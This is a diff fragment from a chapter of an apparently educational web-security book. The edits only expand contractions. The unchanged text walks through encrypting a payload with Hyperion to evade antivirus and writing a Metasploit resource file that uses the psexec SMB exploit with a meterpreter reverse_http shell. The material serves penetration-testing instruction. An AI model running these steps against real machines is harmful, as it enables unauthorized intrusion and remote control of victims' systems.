binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle0/manuscript/markdown/main/chapter10.md

 G> `hyperion.exe -v payload.exe encrypted-payload.exe`
 G> We then put the encrypted payload somewhere where Metasploit can access it:
 G> I just copied it back to `/usr/share/veil-output/compiled/encrypted-payload.exe`
-G> We then tell Metasploit where we've put it.
+G> We then tell Metasploit where we have put it.
 G> I created a Metasploit resource file:
 G> `cat ~/demo.rc`
 G>
 G> `use exploit/windows/smb/psexec`
 G> `set payload windows/meterpreter/reverse_http`
 G> `set lport 8080`
-G> `set lhost <IP address that we're going to be listening on for the reverse shell>`
+G> `set lhost <IP address that we are going to be listening on for the reverse shell>`
 G> `set rhost <IP address of target>`
 G> `set exe::custom /usr/share/veil-output/compiled/encrypted-payload.exe`
 G> `set smbuser <target username>`